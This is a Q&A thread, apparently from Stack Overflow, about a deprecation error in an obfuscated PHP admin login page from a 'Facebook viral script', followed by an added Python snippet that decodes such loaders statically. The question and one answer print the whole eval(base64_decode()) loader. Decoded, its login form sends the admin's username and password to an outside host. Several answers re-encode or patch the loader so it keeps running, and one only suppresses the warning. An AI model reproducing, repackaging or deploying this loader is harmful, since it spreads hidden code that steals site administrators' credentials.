0

I am getting this error on my login.php for the admin cpanel. I am using a Facebook viral script.

Deprecated: Function ereg_replace() is deprecated in /home/content/32/10528532/html/shockvideo/admincpanel/login.php(2) : eval()'d code on line 1

Here is my entire PHP:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4u
cGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>


How do I fix this? If you can, please explain it for a newbie like me. Thanks.

4

8 Answers

2

The problem comes from this code:

$_R = ereg_replace('__FILE__', "'" . $_F . "'", $_X);

Replace it with:

$_R = preg_replace('/__FILE__/', "'" . $_F . "'", $_X);
Answered 2013-02-26T15:34:41.467
2

Replace it with preg_replace; ereg_replace has been deprecated since PHP 5.3.

Answered 2013-02-26T15:24:15.357
1

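Deprecated functions are functions that should no longer be used and that will be removed in some future version of PHP.

You should use an alternative instead of them. Try using preg_replace.

Answered 2013-02-26T15:24:20.677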
0

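We were all newbies once. But first run a simple search on SO; even with Google you can find a lot. Sometimes I do this on Google >

ereg_replace site:stackoverflow.com

and then press Enter. This shows what you may be looking for.

Now, back to your question: can you read this one on SO (Stackoverflow)?

PHP ereg_replace deprecated

Answered 2013-02-26T16:15:31.513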
0

This badly written, laughably "protected" code can be fixed simply by replacing:

ereg_replace('pattern', 'replacement', $target);

with:

preg_replace('/pattern/', 'replacement', $target);

Which gives you:

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=preg_replace('/__FILE__/', "'".$_F."'", $_X);eval($_R);$_R=0;$_X=0;

Which encodes to:

JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPXByZWdfcmVwbGFjZSgnL19fRklMRV9fLycsICInIi4kX0YuIiciLCAkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs=

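You want to put that in the eval(base64_decode()) at the end.

Note that code containing eval(base64_decode()) is usually a virus. Don't be surprised if it starts getting "cleaned" by scanning processes running on your host's servers.

Answered 2013-02-26T16:15:42.070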
0

From start to finish:

Replace "eval" in the code with "echo". Run the PHP script from the console and you will get this PHP code:

<?php
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
?>

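Now you can see the problematic function.

Quick fix: replace ereg_replace with @ereg_replace.

Remember: this only hides the warning. You need to rewrite the code and use preg_match(), because your code depends on a deprecated function that will soon be removed from PHP.

Here is your fixed code: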

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4u
cGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');   $_R=@ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;?>
Answered 2013-02-26T16:04:36.590
0

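Your code is encoded. It looks easy to reverse. Start by decoding the base64 string. After decoding, you need to replace some digits with their equivalent letters.

Once you have done that, switching ereg_replace to preg_replace is trivial. The same pattern will usually work, but the format is slightly different.

Here is the final decoded part.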

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
Answered 2013-02-26T15:29:38.543
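
The decoding steps described in the answer above, done statically so that nothing is ever passed to eval; this is an added example, not part of any answer on this page. The function names, the `login.php` placeholder file name and the sample input are assumptions constructed for illustration.

```python
import base64
import re

# Substitution performed by the loader's strtr($_X,'123456aouie','aouie123456').
DECODE_TABLE = str.maketrans("123456aouie", "aouie123456")
# Inverse mapping, used only to build the constructed sample below.
ENCODE_TABLE = str.maketrans("aouie123456", "123456aouie")

# The blob may be wrapped over several lines, so whitespace is allowed in it.
BLOB_RE = re.compile(r"\$_X\s*=\s*'([A-Za-z0-9+/=\s]+)'")
STUB_RE = re.compile(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")


def decode_loader(php_source, file_name="login.php"):
    """Return (stub, payload) as text for review. Nothing is evaluated."""
    blob = BLOB_RE.search(php_source)
    stub = STUB_RE.search(php_source)
    if blob is None or stub is None:
        raise ValueError("not the $_X / eval(base64_decode()) loader shape")
    stub_src = base64.b64decode(stub.group(1)).decode("latin-1")
    raw = base64.b64decode("".join(blob.group(1).split())).decode("latin-1")
    payload = raw.translate(DECODE_TABLE)
    # Same effect as the loader's ereg_replace/preg_replace on __FILE__.
    payload = payload.replace("__FILE__", "'" + file_name + "'")
    return stub_src, payload


def build_sample(plain_php, stub_php):
    """Constructed test input: wrap harmless PHP the way the loader does."""
    blob = base64.b64encode(plain_php.translate(ENCODE_TABLE).encode()).decode()
    stub = base64.b64encode(stub_php.encode()).decode()
    return ("<?php $_F=__FILE__;$_X='" + blob + "';"
            "eval(base64_decode('" + stub + "'));?>")


# Constructed, harmless sample (not the script from the question).
SAMPLE_PLAIN = '?><?php require "../src/lib.php"; echo basename(__FILE__); ?>'
SAMPLE_STUB = ("$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');"
               "$_R=preg_replace('/__FILE__/',\"'\".$_F.\"'\",$_X);eval($_R);")

if __name__ == "__main__":
    stub_text, payload_text = decode_loader(build_sample(SAMPLE_PLAIN, SAMPLE_STUB))
    print("loader stub:\n" + stub_text)
    print("decoded payload:\n" + payload_text)
```

Reading the decoded payload this way shows what the script actually does, including any remote URLs it posts to, before anyone decides whether to keep running it.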
-1

Temporary fix: change ereg_replace() to @ereg_replace().

This will hide the warning.

But you need to rewrite the code with preg_replace().

Answered 2013-02-26T15:23:56.190